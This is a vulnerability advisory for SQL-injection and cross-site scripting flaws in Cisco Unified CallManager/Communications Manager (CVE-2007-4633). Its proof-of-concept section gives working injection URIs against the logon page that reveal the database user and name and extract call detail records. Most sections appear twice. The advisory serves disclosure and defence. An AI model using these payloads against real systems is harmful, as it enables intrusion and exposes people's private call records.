Cisco CallManager/Communications Manager SQL Injection and Cross-Site Scripting Vulnerabilities
BID:25480
Info
Cisco CallManager/Communications Manager SQL Injection and Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 25480 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4633 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 29 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | The vendor disclosed these issues. |
| Vulnerable: |
Cisco Unified Communications Manager 4.2(3)sr2 Cisco Unified Communications Manager 4.2 (3)SR2b Cisco Unified CallManager 4.2(3)SR1 Cisco Unified CallManager 4.2 Cisco Unified CallManager 4.1(3)sr5 Cisco Unified CallManager 4.1(3)SR4 Cisco Unified CallManager 4.1 (3)SR5b Cisco Unified CallManager 4.1 Cisco Unified CallManager 4.0 Cisco Unified CallManager 3.3(5)sr3 Cisco Unified CallManager 3.3(5)SR2a Cisco Unified CallManager 3.3 |
| Not Vulnerable: |
Cisco Unified Communications Manager 4.3(1)sr.1 Cisco Unified Communications Manager 4.2(3)sr2 Cisco Unified CallManager 4.1(3)sr5 Cisco Unified CallManager 3.3(5)sr2b |
Discussion
Cisco CallManager/Communications Manager SQL Injection and Cross-Site Scripting Vulnerabilities
Cisco Unified CallManager and Unified Communications Manager are prone to multiple input-validation vulnerabilities because the applications fail to properly sanitize user-supplied input. These issues include a cross-site scripting vulnerability and an SQL-injection vulnerability.
A successful exploit may allow an attacker to steal cookie-based authentication credentials, execute malicious script code in a user's browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Cisco Unified CallManager and Unified Communications Manager are prone to multiple input-validation vulnerabilities because the applications fail to properly sanitize user-supplied input. These issues include a cross-site scripting vulnerability and an SQL-injection vulnerability.
A successful exploit may allow an attacker to steal cookie-based authentication credentials, execute malicious script code in a user's browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Cisco CallManager/Communications Manager SQL Injection and Cross-Site Scripting Vulnerabilities
To exploit the cross-site scripting vulnerability, an attacker entices an unsuspecting victim to follow a malicious URI. The attacker can exploit the SQL-injection vulnerability through a browser.
The following proof-of-concept URIs are available for the SQL-injection vulnerability:
To display the logged-in database user:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To display the selected database:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To display the UNIX time when a call was made from extension 12345:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To display the destination number for that call. Replace "1174900000" with the value from the previous query:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To exploit the cross-site scripting vulnerability, an attacker entices an unsuspecting victim to follow a malicious URI. The attacker can exploit the SQL-injection vulnerability through a browser.
The following proof-of-concept URIs are available for the SQL-injection vulnerability:
To display the logged-in database user:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To display the selected database:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To display the UNIX time when a call was made from extension 12345:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
To display the destination number for that call. Replace "1174900000" with the value from the previous query:
https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='
Solution / Fix
Cisco CallManager/Communications Manager SQL Injection and Cross-Site Scripting Vulnerabilities
Solution:
The vendor has an advisory detailing updates to address these issues. Please contact the vendor for details on obtaining and applying the appropriate updates.
Solution:
The vendor has an advisory detailing updates to address these issues. Please contact the vendor for details on obtaining and applying the appropriate updates.
References
Cisco CallManager/Communications Manager SQL Injection and Cross-Site Scripting Vulnerabilities
References:
References:
- Cisco Homepage (Cisco )
- Cisco Unified Communications Manager (CallManager) (Cisco)
- Cisco Security Advisory: XSS and SQL Injection in Cisco CallManager/Unified Comm (Cisco)
- SQL Injection in Cisco CallManager (Elliot Kendall)
- Cisco Security Advisory: XSS and SQL Injection in Cisco CallManager/Unified Comm (Cisco)